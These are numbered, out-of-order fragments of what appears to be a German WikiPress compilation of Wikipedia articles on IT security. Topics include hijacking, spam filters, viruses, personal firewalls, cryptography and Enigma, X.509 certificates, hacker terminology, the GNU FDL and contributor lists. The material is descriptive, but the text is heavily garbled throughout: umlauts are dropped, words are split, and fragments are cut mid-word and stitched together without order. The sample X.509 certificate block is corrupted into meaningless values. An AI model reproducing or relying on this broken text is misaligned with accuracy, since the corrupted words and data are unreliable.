432. obVoss Jan Niggemann JanKG Janmohr Jant Ja nusbs01 JanW Jcr JCS JD Jed Jef Infojef Jello Jemibabe JensKohl JensLang Jensw Jergen Jeroni mo Jesusfreund jha Jigoro Jkirschbaum Jla net de Jmsanta Joachim T JochenF Jodevin Joerg Reiher Joerglauer Jofi Jofisch Johannes Bretscher JohannWalter John Doe Johnny drossel Joho345 Jo i Jokannes Jonathan Hornung Jonelo Joni2 Jordan1976 Joscha Josef Spindelb ck Jowi24 Jp Jpp JuergenL Juesch Julian JunK JustinSane Jwilkes Ka Kabelsalat Kaemmi KaerF Kaiblanken horn Kaktus Kalinka Kam Solusar Kampfelb Karl Gruber Karlheinzii Karl Henner Karma king101 KarstenSchulz Kasper4711 Kaster Katharina Katonka Kdwnv Keichwa Keimzelle Keno Keymaster Keyser Soze Kleopatra Kiker99 Kiki1701 King Kingruedi Kinley Kipferl Kju Kku Klamsi Klaus Jesper Klaus Rilling Kleinbahner Kleiner Frosch Klever Kliv Kloth Knallfrosch Koethnig Kookaburra Kopoltra Koppi2 Korelstar Korre Kradi Kraude Kretzer2 Kris Kaiser KristianRink Krje Krokofant KSebi Kubieziel KUI Kurt Jansson Kurt seebauer Kuschti Langec Lawa Learny Lecartia Leckse Leipnizkeks Leki Lemmie Lentando Leonardo LeonardoRob0t 324 Gesamtautorenliste LeonWeber LetsGetLauth Lexlan Lib Liberatus LiBot Libro Lichtkind Linum Liquidat Lley Lobservateur Lofor Lomion Longamp Lopsterx L schfix LosHawlos Lostintranslation LostSoul Lothar Kimmerin
433. oder Social Engineering herausgefunden hnlich wie in der Graffitis zene werden von denjenigen die die Verunstaltungen durchgef hrt ha ben Bilder oder Spr che hinterlassen Diese ver nderten Seiten bleiben in verschiedenen Archiven zu besichtigen Quelle http de wikipedia org wiki Defacement Historie 4 10 02 Angelegt von Nerd danach bearbeitet von den Hauptautoren Kris Kaiser Elian Fab Nerd Diddi Ulrich fuchs Head Achim Raschka anonym 12 1 06 1 2 06 WikiPress Redaktion Hijacking Hijacking bezeichnet im Sprachgebrauch des Internets im Allgemeinen den Versuch einer bernahme einer Internetdom ne bzw der Inhalte ei ner Dom ne oder eines Benutzerkontos z B Mail Ebay Amazon Im Falle der mehr oder minder legalen bernahme eines Dom nennamens wird dies auch als Domaingrabbing bezeichnet werden die Inhalte durch Hacker Techniken ver ndert spricht man auch von Defacement Folgende Auswahl zeigt welche Vorg nge im Besonderen unter den Begriff fallen Domain Name Hijacking Versuch durch Klage o A rechtliche Ma nahmen den Namen einer Internetdom ne zu erhalten Network Hijacking bernahme eines schlecht gesch tzten Servers im Internet bzw in einem WLAN dabei wird oft der eigentliche Besit zer des Servers ausgesperrt Typing Error Hijacking bzw Type Writing Hijacking Versuch User auf eine Webseite zu locken indem hnliche oder sich durch Tippfehler ergebende Namen einer sehr bekannten Web
434. oder nicht 85 Software Bayes Filter Methode Alternativ kann der Spam auch auf Grund der Bayesschen Wahrschein lichkeit gefiltert werden Das sind so genannte selbstlernende Filter Der Benutzer muss etwa die ersten 1000 E Mails manuell einsortieren in Spam und Nicht Spam Danach erkennt das System fast selbstst ndig mit einer Trefferquote von meist ber 95 die Spam E Mail Vom System fehlerhaft einsortierte E Mails muss der Anwender manuell nachsortieren Dadurch wird die Trefferquote stetig erh ht Diese Methode ist der Blacklist Me thode meist deutlich berlegen Diesen Mechanismus machen sich Bogofilter und Mozilla Thunder bird sowie der vor allem im deutschen Sprachraum beliebte Spamihilator in den aktuellen Versionen zu Nutze Dabei muss das Programm jeweils vom Benutzer trainiert werden bevor es zuverl ssig Spam erkennt Eine dem Bayes Filter artverwandte Methode ist der Markov Filter Er nutzt dazu eine Markow Kette und ist effektiver als ein Bayes Filter wie Bill Yerazunis mit seinem Spamfilter CRM114 zeigen konnte Datenbank basierte L sungen Im Usenet wurde schon in den 1990er Jahren diskutiert Spam aufgrund der in der Mail beworbenen URLs und ggf Telefonnummern zu erken nen Zwar k nnen die Spammer die Nachrichten beliebig modifizieren und personalisieren aber da es letztlich bei UCE immer darum geht den Benutzer zu einer Kontaktaufnahme zu verleiten und der m gli che Adressraum nicht unbegrenzt variab
435. of fene Relays u a verbreiteten und immer fter von Mailbetreibern genutzt werden f hrte zu Denial of Service Angriffen gegen ber den Betreibern der jeweiligen Liste und deren ISPs Es wird vermutet dass das 2003 vermehrte Aufkommen von W r mern auf die Verbreitung und Durchsetzung von statistischen Ana lysetools z B Bayes Filtern zur ckzuf hren ist Einige Provider gehen dazu ber den Port 25 zu berwachen oder ganz zu sperren um eventuell vorhandenen Viren die M glichkeit zu nehmen auf diesem Port Mails zu verschicken Neue bertragungsmethoden von Mail die eine Authentifizierung der beteiligten Mailserver erlauben sollen das bisherige System SMTP ab l sen Erstellt wird ein neuer Standard von Seiten der IETF gleichzeitig arbeiten gro e Mailanbieter an eigenen L sungen Das Sender Policy Framework ist ein sehr vielversprechendes Konzept das auf einem zu s tzlichen DNS TXT Eintrag basiert Es werden bereits Patches f r vie le popul re so genannte MTAs Mail Transfer Agents angeboten 206 Spam Ein weiterer Ansatz ist die Einf hrung von virtuellen Briefmarken den beispielsweise HashCash verfolgt Dabei muss der Versender pro abge schickter E Mail einige Sekunden Rechenzeit investieren um eine sol che virtuelle Briefmarke die nur f r begrenzten Zeitraum und f r eine bestimmte Empf ngeradresse g ltig ist zu erstellen Auf der Empf
436. of Invariant Sections and required Cover Texts given in the Document s license notice Include an unaltered copy of this License Preserve the section Entitled History Preserve its Title and add to it an item stating at least the title year new authors and publisher of the Modified Version as given on the Title Page If there is no section Entitled w mon rao 328 GNU Free Documentation License History in the Document create one stating the title year authors and publisher of the Document as given on its Title Page then add an item describing the Modified Version as stated in the previous sentence J Preserve the network location if any given in the Document for public access to a Transparent copy of the Document and likewise the network locations given in the Document for previous versions it was based on These may be placed in the History section You may omit a network location for a work that was published at least four years before the Document itself or if the original publisher of the version it refers to gives permission K For any section Entitled Acknowledgements or Dedications Preserve the Title of the section and preserve in the section all the substance and tone of each of the contributor acknowledgements and or dedications given therein L Preserve all the Invariant Sections of the Document unaltered in their text and in their titles Section numbers or the equivalent are not considered part of
437. ografie zuerst vom Milit r entwickelt bevor die ffentliche Forschung dies erreichte Am 17 Dezember 1997 ver ffentlichten GCHQ ein Dokument in welchem sie beanspruchen dass sie bereits vor der Ver ffentlichung des Artikels von Diffie und Hellman ein Public Key Ver fahren gefunden haben Verschiedene als geheim eingestufte Dokumente 269 Kryptografie wurden in den 1960ern und 1970ern geschrieben die zu Entw rfen hn lich denen von RSA und Diffie Hellmann f hrten Eine Anmerkung zur Terminologie In der Kryptografie wird zwischen Codes und Chiffren unterschieden Codes operieren auf der Basis von gan zen W rtern wo hingegen Chiffren auf Zeichenbasis arbeiten Da es sich bei fast allen heutigen kryptografischen Verfahren um Chiffren handelt spricht man blicher Weise von de chiffrieren und nicht von de codieren Quantenkryptografie Derzeit werden Verschl sselungstechniken entwickelt die auf den phy sikalischen Gesetzen der Quantenmechanik beruhen gleichzeitig k nn ten klassische Verschl sselungsverfahren durch Quantencomputer ihre Sicherheit verlieren Literatur Bauer Friedrich L Entzifferte Geheimnisse Methoden und Maximen der Kryptologie Dritte berarbeitete Auflage Sprin ger Berlin 2000 ISBN 3 540 67931 6 Beutelspacher Albrecht Schwenk J rg Wolfenstetter Klaus Dieter Moderne Verfahren der Kryptographie View eg 2004 ISBN 3 528 36590 0 Buchmann Johannes Einf hrung in die Kryptograph
438. ogramm theoretisch belie big oft infizieren was aufgrund der Dateigr e und der CPU Belastung sehr schnell auffallen w rde Dieses Erkennungsmuster die Signatur kann unter gewissen Umst nden auch von Virenscannern genutzt wer den um das Virus zu erkennen Polymorphe Viren sind in der Lage mit verschiedenen Signaturen zu arbeiten die sich ver ndern k nnen jedoch stets einer Regel gehorchen Daher ist es den Herstellern von Anti Viren Software relativ leicht und schnell m glich ein neues Virus nach dessen Bekanntwerden zu identifizieren 39 Viren W rmer Trojaner Viele Viren benutzen anstelle von polymorphen Signaturen sehr kleine Kennzeichnungen wie zum Beispiel ein ungenutztes Byte im Portable Executable Format Ein Virenscanner kann dieses eine Byte nicht als Er kennungsmuster nutzen da es zu viele falsch positive Treffer geben w r de F r ein Virus ist es jedoch kein Problem wenn es unter ung nstigen Verh ltnissen einige Dateien nicht infiziert Geschichte Theoretische Anf nge Bis 1985 John von Neumann ver ffentlichte im Jahr 1949 seine Arbeit Theory and Organization of Complicated Au tomata Darin stellt er die These auf dass ein Computerprogramm sich selbst wiederherstellen kann Das war die erste Erw hnung von compu terviren hnlicher Software Erst als Victor Vyssotsky Robert Morris Sr und Doug McIlroy Programmierer bei Bell Labs ein Computerspiel mit dem Namen Darwin erstellten wurde die
439. omputersystemen Doch recht bald erkannte man dass Viren zu weitaus mehr in der Lage sind Es begann eine rasante Weiterentwicklung der Sch dlinge und der Ausbau ihrer F higkeiten vom simplen L schen von Dateien ber das Ausspionieren von Daten z B von Passw rtern bis hin zum ffnen des Rechners f r entfernte Benutzer Backdoor Mittlerweile existieren diverse Bauk sten im Internet die neben einer Anleitung auch alle notwendigen Bestandteile f r das einfache Program mieren von Viren liefern Nicht zuletzt schleusen kriminelle Organisa tionen Viren auf PCs ein um diese f r ihre Zwecke UBE UCE DoS Angriffe etc zu nutzen So entstanden bereits riesige Bot Netze die auch illegal vermietet werden Gegenw rtig sind fast ausschlie lich die Betriebssysteme der Firma Microsoft von Viren betroffen Angriffe und Schutz Besonders der Anschluss vieler Computer mit sensiblen Daten an das In ternet und Programmierfehler in fast jeder Software machen es quasi un m glich Sicherheit vor jeder Art von Angriffen zu erreichen Ein System wird dann als sicher bezeichnet wenn der Aufwand f r das Eindringen in das System h her ist als der daraus resultierende Nutzen f r den Angrei fer Deshalb ist es wichtig die H rden f r einen erfolgreichen Einbruch m glichst hoch zu setzen und damit das Risiko zu reduzieren Insbesondere sollte man keine bekannterma en gef hrdete Software einsetzen Im Bereich der Personal Computer falle
440. onal Firewall ei nen Anwendungsfilter Application Control der einzelne Anwendungs programme gezielt von der Netzkommunikation ausschlie en kann Zu s tzlich kann man die Anwendung in die Regeln f r den zuvor erw hnten Paketfilter einflie en lassen so dass dieser anwendungsbasiert filtern kann So kann einzelnen Anwendungen eine bestimmte Kommunikation erlaubt werden die anderen verboten ist Die Personal Firewall stellt dem Anwender oder Administrator ein grafi sches Frontend f r die Konfiguration von Paket und Anwendungsfilter zur Verf gung 95 Software Weitere Funktionen Viele Personal Firewalls bieten weitere Funktionen an die aber nicht unbedingt in jedem Produkt vorhanden sind Die meisten Personal Firewalls verf gen ber einen Lernmodus Dabei werden die Regeln f r Paketfilter und Anwendungsfilter durch Interakti on mit dem Benutzer festgelegt Registriert die Personal Firewall Daten verkehr f r den noch keine Regel existiert wird dies dem Benutzer in einem Dialogfenster gemeldet Er kann daraufhin entscheiden ob diese Verbindung gestattet oder blockiert werden soll Aus der Antwort kann die Firewall eine neue Regel formulieren die in Zukunft angewendet wird Mit einem Content Filter k nnen einige Personal Firewalls Inhalte von Datenpaketen berpr fen und beispielsweise ActiveX Komponenten Ja vaScript oder Werbebanner aus angeforderten HTML Seiten herausfil tern Content Filter die sich auf Webanwendu
441. onal Firewalls bezweifelt wird hat das Bundesamt f r Sicherheit in der Informationstechnik BSI die Personal Firewall als eine empfohlene Schutzma nahme f r Nutzer des Internets aufgelistet Zweck und Funktionsweise Eine Personal Firewall von engl firewall Brandmauer ist Software die auf einem Host d h auf einem an ein Netz angeschlossenen Computer installiert ist um diesen vor Gefahren aus dem Netz zu sch tzen Bei dem Netz kann es sich um das Internet oder um ein lokales Netz eines Unternehmens oder eines Privathaushaltes handeln Die Personal Firewall soll Zugriffe von au en auf den Rechner kontrollieren und kann 94 Personal Firewall WEB SERVER WURM TCP 445 C BEN WURM TCP 135 42 Abb 8 Firewall Prinzip unerw nschte Daten werden ausgefiltert grau gew nschte Daten schwarz kommen an diese selektiv verhindern um ihn vor W rmern wie W32 Blaster oder Sasser Skriptkiddies oder Crackern zu sch tzen Eine weitere Auf gabe besteht darin Kommunikation von Trojanischen Pferden oder Spyware zu erkennen und zu verhindern Grundlegende Funktionen Der Hauptbestandteil einer Personal Fire wall ist ein Paketfilter Dieser Paketfilter erm glicht es eingehende oder ausgehende Datenpakete nach vorgegebenen Regeln zu blockieren Fil terkriterien k nnen Quell und Zieladresse Protokoll sowie Quell und Zielport sein Im Unterschied zu externen Firewalls hat eine Pers
442. onal Firewalls bieten einen Stealth Modus von engl stealth Heimlichkeit an Bei diesem Modus werden Anfragen auf ungenutzten Ports unbeantwortet verworfen Normalerweise w rde in einem solchen Fall eine Antwort erfolgen dass der Rechner erreichbar der Port jedoch nicht belegt ist Durch das Ausbleiben der Antwort soll es dem Angreifer schwerer gemacht werden Informationen ber das System zu sammeln Man bezeichnet diese Vorgangsweise als Security through Obscurity Si cherheit durch Verschleierung Viele Personal Firewalls pr fen selbstst ndig ob der Hersteller eine aktuellere Version der Firewallsoftware im Netz bereitgestellt hat laden diese gegebenenfalls herunter und installieren sie Diesen Vorgang nennt man Automatisches Update er gew hrleistet eine zeitnahe Aktualisierung der Firewallsoftware wenn diese von Sicherheitsl cken betroffen sein sollte Ein Fernwartungszugang kann zur Administration einer Personal Firewall auf einem Endger t im Netzwerk durch den Netzadministrator dienen Abgrenzung zur Firewall Eine Terminologie zum Thema gibt es nicht Begriffe werden unterschied lich manchmal sogar widerspr chlich benutzt Eine Personal Firewall ist auf dem zu sch tzenden Host installiert Manchmal wird die damit verbundene M glichkeit anwendungsspezi 97 Software fisch zu filtern als zwingendes Merkmal einer Personal Firewall gesehen Eine andere Sichtweise ist dass es sich bei einer Personal Firewall um
443. opy and distribute verbatim copies of this license document but changing it is not allowed 0 PREAMBLE The purpose of this License is to make a manual textbook or other functional and useful document free in the sense of freedom to assure everyone the effective freedom to copy and redistribute it with or without modifying it either commercially or noncommercially Secondarily this License preserves for the author and publisher a way to get credit for their work while not being considered responsible for modifications made by others This License is a kind of copyleft which means that derivative works of the document must themselves be free in the same sense It complements the GNU General Public License which is a copyleft license designed for free software We have designed this License in order to use it for manuals for free software because free software needs free documentation a free program should come with manuals providing the same freedoms that the software does But this License is not limited to software manuals it can be used for any textual work regardless of subject matter or whether it is published as a printed book We recommend this License principally for works whose purpose is instruction or reference 1 APPLICABILITY AND DEFINITIONS This License applies to any manual or other work in any medium that contains a notice placed by the copyright holder saying it can be distributed under the terms of this License
444. orderlich dass der Interes sent pers nlich erscheint und seinen Personalausweis vorlegt Bei ande ren wiederum reicht die Angabe einer g ltigen E Mail Adresse Je nach Qualit t des Registrierungsprozesses variiert nat rlich auch die Aussa gekraft eines Zertifikates Wurde ein Zertifikat aufgrund einer h chst pers nlichen Registrierung erzeugt kann es z B f r die Erstellung einer qualifizierten elektronischen Signatur nach dem Signaturgesetz SigG 143 PGP und Zertfikate Beispiel Text Darstellung eines X 509v3 Zertifikats eigentlich sind Zertifikate gem ASN 1 kodiert Certificate Data Version 3 0X2 Serial Number 1 0x1 Signature Algorithm md5WithRSAEncryption Issuer C XY ST Austria L Graz O TrustMe Ltd OU Certificate Authority CN CA Email ca trustme dom Validity Not Before Vet 2971733910720 0 0EEMT Not After Oct 29 17 39 10 2001 GMT Subject C DE ST Austria L Vienna O Home OU Web Lab CN anywhere com Email xyz anywhere com Subject Public Key Info Public Key Algorithm rsaEncryption RSA Public Key 1024 kit Modulus 1024 bit 00 c4 40 4c 6e 14 1b 61 36 84 24 b2 61 c0 b5 d7 e4 7a a5 4b 94 ef d9 5e 43 7f c1 64 80 fd Cie SSW Bela loys WIR TS StsOl Sake RENO Bis 31798 DEE 01 7 ei 9 90232231259 187162 37 19 741 Stills 662362052 62 benutzt werden Wurde nur die E Mail Adresse des Inhabers best tigt kann es zumindest f r den authentischen E Mail Verkehr dienen Diese Unterschiede
445. otocol 227 Adleman Leonard 40 279 Advanced Encryption Standard 240 252 253 269 271 276 282 291 304 319 322 Adware 107 Aircrack 250 255 Akustikkoppler 213 Algorithmus 134 248 253 262 267 271 281 286 290 291 Alpha Beta Suche 292 Alphabetum Kaldeorum 268 Amiga 24 214 Angarsk 44 Anonymit t 11 155 AntiVir 79 Antivirenprogramm 21 27 47 68 69 75 76 79 99 104 154 ARP Spoofing 227 ARPANET 182 183 ASCII 166 285 ASN 1 144 Asymmetrisches Kryptosystem 137 142 276 277 282 320 Asymmetrische Verschl sselung 134 140 269 AtariST 41 Authentifizierung 11 20 130 137 142 168 194 197 206 213 257 267 286 287 288 B Backdoor 12 21 66 68 71 72 73 74 75 80 84 100 168 208 Basic Input Output System 29 45 46 48 49 124 168 B umler Helmut 19 Bayesscher Filter 85 86 192 199 206 Betriebssystem 22 45 48 52 56 58 61 65 68 70 83 96 99 108 114 125 257 BIND 13 Bit 117 258 259 271 Blacklist 85 198 Blind Carbon Copy 197 Blockverschl sselung 277 283 Blowfish 277 Bluetooth 49 50 54 61 Bootvirus 45 46 Botnet 12 82 Bounce 196 Breschinski Dirk 224 Bridge CA 142 Bridging Mode 244 Browser 164 196 322 Browser Hijacker 212 Brunner John 40 60 Brute Force Methode 212 229 252 273 289 291 294 Bug 213 Bundesamt fiir Sicherheit in der Informationstechnik 13 94 98 247 Busmaster 115 C C64 214 CAcert 1
446. ourcen ein Sicherheitsrisiko darstellen Zudem ist die Interpretation des HTML Codes stark von der Benutzerumgebung des Empf ngers abh ngig wo durch optische Effekte oder Formatierungen h ufig nicht so dargestellt werden wie dies vom Absender gedacht war Gr e Die maximale Gr e von E Mails ist nicht prinzipiell begrenzt In der Realit t zeigen sich allerdings Grenzen durch technische oder ad ministrative Beschr nkungen der Systeme welche die E Mail bertragen oder empfangen So treten derzeit 2005 bei E Mails ab ca 20 MB Gr e regelm ig Probleme auf In solchen F llen erh lt der Absender eine Feh lermeldung Elemente einer E Mail Die E Mail Adresse Eine E Mail Adresse besteht immer aus zwei Teilen zum einen dem local part genannte Teil vor dem zum anderen dem domain part hinter dem Beide Teile werden durch das At Zeichen Aussprache engl at oder umgangssprachlich Klammeraffe oder Af fenschwanz verbunden Es ergibt sich also lokaler_teil domainname zum Beispiel max mustermann wikipedia org Der hintere Teil domain part fungiert dabei wie Stadt und Postleitzahl bei einer Postanschrift Durch ihn wissen die Server die die E Mail weiterleiten an welchen Ser ver diese zugestellt werden soll Der vordere Teil local part hingegen ist quasi das Postfach in welches die E Mail eingeworfen werden soll Dateianh nge Ein Dateianhang engl attachment ist eine Datei welche im Body e
447. ppen oder markante W r ter enth lt mit denen eine Analyse versucht werden kann Die bekannten W rter werden als Crib bezeichnet Known Plaintext Der Angreifer besitzt Geheimtext e und die den zu geh rigen Klartext e Beide werden benutzt um den Schl ssel zu ermit teln Angriff mit frei w hlbarem Klartext engl chosen plaintext attack Beim Angriff mit frei w hlbarem Klartext kann der Angreifer Kryptoa nalytiker die zu verschl sselnden Klartexte frei w hlen und hat Zugang zu den entsprechenden Geheimtexten Gegen ber dem Angriff mit be kanntem Klartext hat diese Variante den Vorteil dass der Angreifer ge zielt den Klartext variieren und die dadurch entstehenden Ver nderungen im Geheimtext analysieren kann Typischerweise schiebt der Angreifer dem Opfer die zu verschl sselnden Nachrichten so unter dass dem Opfer die Selektion durch eine andere Person nicht bewusst wird Historisches Beispiel Im Zweiten Weltkrieg wurden von der britischen Royal Navy gezielt Minenfelder verlegt die den Angriff mit frei w hlba rem Klartext erm glichten Die deutsche Aufkl rung bermittelte die Da ten der Minenfelder Position Gr e Verlegungszeit verschl sselt und per Funk an ihr Hauptquartier Indem die Parameter der Minenfelder bei jeder neuen Verlegung leicht variiert wurden gaben die Briten dem deutschen Milit r den Klartext ihrer Meldungen vor Die verschl sselten Nachrichten wurden abgeh rt und konnten mit den bek
448. r PhilippWeissenbacher WiESi Dwagener anonym 12 1 06 1 2 06 WikiPress Redaktion 174 Hacker Hacker Nach allgemeinem Verst ndnis ist ein Hacker ein beraus talentierter Computerspezialist welcher Sicherheitsbarrieren berwinden und in fremde Systeme eindringen kann Destruktive Hacker werden abwertend als Crasher oder Cracker charakterisiert Ein Hacker der Gebrauch von seinen F higkeiten macht um politisch t tig zu werden wird als Hackti vist bezeichnet In den Medien findet diese Unterscheidung jedoch kaum Beachtung F lschlicherweise wird dort das Verst ndnis des Begriffs Hacker meist auf einen destruktiven Computerexperten reduziert der seine Fertigkei ten vornehmlich f r kriminelle Zwecke nutzt Als Hinweis sei erw hnt dass der Begriff Softwarecracker nicht gleich bedeutend mit Cracker als destruktiver Hacker ist Auch wird der Be griff Skriptkiddie im allgemeinen Sprachgebrauch oft mit dem Begriff Hacker gleichgesetzt Skriptkiddie ist jedoch die Bezeichnung f r einen herk mmlichen Computeranwender der weit von einem begabten Com puterspezialisten entfernt ist Da es anders als der Hacker nichts von der Sicherheitsl cke versteht kann ein Skriptkiddie Sicherheitsbarrieren aus schlie lich mithilfe vorgefertigter Programme berwinden Die F hig keit im Problemfall zu improvisieren besitzt es also nicht In der Fachwelt wird daher deutlich zwischen einem Hacker als Sicherheitsexperten und ei
449. r ger f r ein Lese oder Abspielger t lesbar sein m ssen Dabei ist nicht zu verhindern dass das Abspielger t die gelesenen Daten auf ei nem anderen Datentr ger abspeichert Ein Kopierschutz ist daher nur f r bestimmte Leseger te wirksam sch tzt die Daten aber nicht gegen ber manipulierten Leseger ten oder Leseger ten fremder Hersteller Anstel le des Leseger ts kann bei digitalen Daten auch Software oder Firmware treten Beispiele DIN Normen wurden fr her auf farbigem Papier ver ffentlicht das die Kopie mit damals blichen Schwarz Wei Kopierern durch die Aus wahl von Schrift und Hintergrundfarbe unm glich machte F r Com puterspiele wie Zak McKracken wurden auf die gleiche Art gesch tzte Codetabellen eingesetzt die freilich bald von Fans handschriftlich kopiert und verbreitet wurden Bei Audio CDs werden absichtlich Fehler im Datenformat eingebaut und damit der Standard verletzt In der Regel werden diese Fehler von g ngigen CD Spielern ignoriert da diese nur bestimmte Daten auf der CD interpretieren den so genannten Red Book Standard CD ROM Laufwerke versuchen hingegen die fehlerhaften Daten zu interpretie ren was zu Fehlermeldungen und Abst rzen f hren kann Bei diesen Laufwerken kann durch kopiergesch tzte CDs sogar erh hter Ger te verschlei auftreten Viele Autoradios und tragbare CD Player basie ren auf der sehr kosteng nstigen CD ROM Technik und sind deshalb ebenfalls betroffen Daten werden
450. r Regel nicht zuverl ssig arbeiten entstehen zudem Sch den in h ufig nicht zu bezifferender H he durch f lschlich blockierte Nachrichten sowohl beim Absender der die Nachricht erneut versenden muss als auch beim Empf nger der die Nachricht nicht erh lt durch Internet Verbindungskosten Unternehmen und Internet Provi der bezahlen ihre Leitungen typischer Weise nicht nach Zeit sondern nach bertragener Datenmenge oder mittlerem Datendurchsatz Da mit kostet jedes Byte Spam das ber die Leitung wandert durch ausfallende oder langsamer arbeitende Mailserver 2004 wurden unter anderem die Server der TU Braunschweig der FU Berlin und der Bundesregierung per Spam Mail attackiert Damit entstehen ganz massive wirtschaftliche und technische Sch den und Gefahren Verhinderung von Spam Neben der Filterung der Nachrichten kann Spam dadurch verringert werden dass E Mail Adressen nur an vertraute Personen weitergegeben und nicht im Internet ver ffentlicht werden Um trotzdem an Foren teilzunehmen oder eine Webseite zu betreiben gibt es M glichkeiten die E Mail Adresse zu verschleiern Verschleierung von E Mail Adressen Wird f r ein ffentliches Forum zum Beispiel Usenet eine E Mailadresse ben tigt lohnt es sich Wegwerf E Mailadressen mit einem internen Z hler z B von Spamgourmet und einer zeitlich beschr nkten G ltigkeit anzulegen Da die E Mail Adressen aus dem Internet von so genannten Spam Harvestern automatisch a
451. r Szene Menschen welche illegal Software verbreiten werden in der ffent lichkeit Raubkopierer genannt w hrend sie innerhalb der Crackerszene als Trader oder Courier betitelt werden Crackergruppen sind meist streng organisiert Beispiele f r solche Gruppen sind BLIZZARD CORE Razor 1911 DEViANCE Kalisto W P W H2O ParadoX Fairlight Dynamic Duo Team Eclipse und TSRh Viele Softwarecracker sind dabei nicht an Profit interessiert Vielmehr betrachten sie das Cracken gegen die Zeit als Wettbewerb der Gruppen gegeneinander Auszug aus dem Buch Hackerland Softwarefirmen suchten in den 80er Jahren nach Wegen um den einzel nen Benutzer vor dem Kopieren der Software zu hindern Die Ma nahme jedoch f hrte dazu dass zun chst Einzelg nger anfingen Software hobby m ig zu cracken Sp ter bildeten sich kleinere Gruppen die es sich zur Aufgabe machten Software kontinuierlich zu cracken und in Umlauf zu bringen Es dauerte nicht lange bis sich schlie lich die Crackergruppen zu einer Szene vereinten und regelm ige Treffen veranstalteten Copypar ties Innerhalb weniger Jahren gr ndete sich eine Subkultur von Crackern die ein gigantisches Netz quer ber den Globus spannte Gruppen und Mit gliedsnamen wurden in Listen festgehalten und weltweit durch Personen die speziell f r diesen Aufgabenbereich eingeteilt waren verteilt Crasher und Cracker als Synonym f r den destruktiven Hacker Ein b swilliger Compute
452. r bleibt Obwohl nicht erforderlich wird darum gebeten dass Sie im Vorfeld der Auslieferung einer gr eren St ckzahl von Kopien Kontakt mit den Autoren des Dokuments aufnehmen um ihnen die M glichkeit zu geben Ihnen eine aktualisierte Version des Dokuments zur Verf gung zu stellen 332 GNU Free Documentation License deutsch 4 VER NDERUNGEN Unter den oben in den Paragraphen 2 und 3 genannten Bedingungen k nnen Sie eine modifizierte Version des Dokuments vervielf ltigen und verbreiten Voraussetzung daf r ist dass Sie die modifizierte Version unter exakt dieser Lizenz herausgeben wobei die modifizierte Version die Rolle des Dokuments bernimmt und damit jedem die weitere Verbreitung und Ver nderung der modifizierten Version erm glicht der eine Kopie davon besitzt Dar ber hinaus m ssen Sie die folgenden Punkte in der modifizierten Version beachten A Verwenden Sie auf der Titelseite und auf den Umschl gen sofern vorhanden einen Titel der sich vom Titel des Dokuments und von fr heren Versionen unterscheidet Die fr heren Versionen sollten sofern es welche gibt im Abschnitt Historie des Dokuments aufgelistet sein Sie k nnen den Titel der vorherigen Version verwenden wenn der urspr ngliche Herausgeber damit einverstanden ist B Nennen Sie auf der Titelseite als Autoren eine oder mehrere Personen oder Rechtstr ger die f r die Urheberschaft der Ver nderungen in der modifizierten Version verantwortlich sind
453. r den neu verstandenen Begriff Cracker nun offiziell auf ein minderwertiges oder besser berfl s siges Individuum reduziert Die Hacker Community wollte so die Ent wicklung nutzen um sich von den destruktiven Elementen unter den Ha ckern zu distanzieren Um dies zu unterstreichen bediente man sich oft des Zitats aus Shakespeares King John z B What cracker is this same that deafs our ears With this abundance of superfluous breath Zu Zeiten Shakespeares waren Cracker Leute welche sich durch rohe Gewalt z B durch das Zerbersten von Schl ssern und T ren Zutritt zu gesicherten Orten verschafften um sich auf kriminelle Weise zu bereichern Literatur Hacker s Guide Markt und Technik ISBN 3 8272 6522 3 Schumacher Markus Hacker Contest Xpert press ISBN 3 540 41164 X Sen Evrim Hackerland Das Logbuch der Szene 3 Auflage Tropen Verlag 2001 ISBN 3 932170 29 6 Sen Evrim Hackertales Geschichten von Freund Feind 1 Auflage Tropen Verlag 2002 ISBN 3 932170 38 5 Stoll Clifford Kuckucksei Die Jagd auf die deutschen Hacker die das Pentagon knackten Fischer Taschenb cher ISBN 3 596 13984 8 Quelle http de wikipedia org wiki Cracker Historie 9 3 03 Anonym angelegt danach bearbeitet von den Hauptautoren ShiningBase Evr NeonZero Trugbild Proggy Steven Malkovich Der Meister Avatar Fritz Mr Anderson MichaelDiederich Diddi Gulli Marc Layer Achim Raschka MAS HsT MGla Zwobot Bali PuppetMaste
454. r die Grund stellung Nun ist die Maschine zur Verschl sselung bereit Der gesamte Schl sselraum der Enigma I ergibt sich somit aus den folgen den vier Faktoren Die Walzenlage Drei von f nf Walzen und eine von zwei Umkehrwalzen werden ausgew hlt Dies ergibt 2 5 4 3 120 m gliche Walzenlagen ent spricht etwa 7 Bit Die Ringstellung Es gibt jeweils 26 verschiedene Ringstellungen f r die mittlere und die rechte Walze Der Ring der linken Walze ist kryptogra fisch bedeutungslos er dient jedoch wie auch die anderen Ringe dem Schutz vor Spionage Insgesamt sind 26 676 Ringstellungen entspricht etwa 9 Bit relevant 301 Kryptografie Die Grundstellung Es gibt f r jede der drei Walzen 26 unterschiedliche Grundstellungen Die Umkehrwalze kann nicht verstellt werden Insge samt somit 26 17 576 Grundstellungen entspricht 14 Bit Die Steckverbindungen Es k nnen bis zu maximal 13 Steckverbindungen zwischen den 26 Buchstaben durchgef hrt werden F r die erste Steckver bindung gibt es 26 Auswahlm glichkeiten f r das eine Steckerende und dann noch 25 f r das andere Ende des Kabels Somit also f r das erste Kabel 26 25 unterschiedliche M glichkeiten es einzustecken Da es aber keine Rolle spielt in welcher Reihenfolge die beiden Kabelenden gesteckt werden entfallen davon die H lfte der M glichkeiten Es bleiben also 26 25 2 325 M glichkeiten f r die erste Steckverbindung F r die zweite Steckverbindung
455. r eines CR Systems der an einer Mailliste teilnimmt ver ursacht im Allgemeinen eine Vielzahl von Challenge Mails da die Ab senderadresse bei Mails an die Mailliste meist nicht ver ndert wird Dies hat zur Folge dass sich jeder Maillistenbeteiligte bei jedem ein zelnen Benutzer eines solchen Systems authentifizieren muss damit dieser die jeweilige Mail von der Mailliste erhalten kann Da dies ab ei ner gewissen Anzahl von Benutzern von CR Systemen innerhalb einer Mailliste die Akzeptanzschwelle vieler Benutzer berschreitet f hrt dies im Allgemeinen dazu dass sich die Benutzer solcher Systeme fr her oder sp ter aus den Diskussionen ausschlie en 198 Spam Spambek mpfung Derzeit wird Spam haupts chlich durch Spam Fil ter bek mpft Neuere Verfahren schlagen vor Spam durch Korrekturen im Simple Mail Transfer Protocol zu bek mpfen Vereinzelt finden sich mittlerweile auch Vorschl ge Spammern das Sammeln der Empf ngera dressen zu erschweren Filter Inzwischen gibt es eine Vielzahl verschiedener Techniken zur au tomatischen 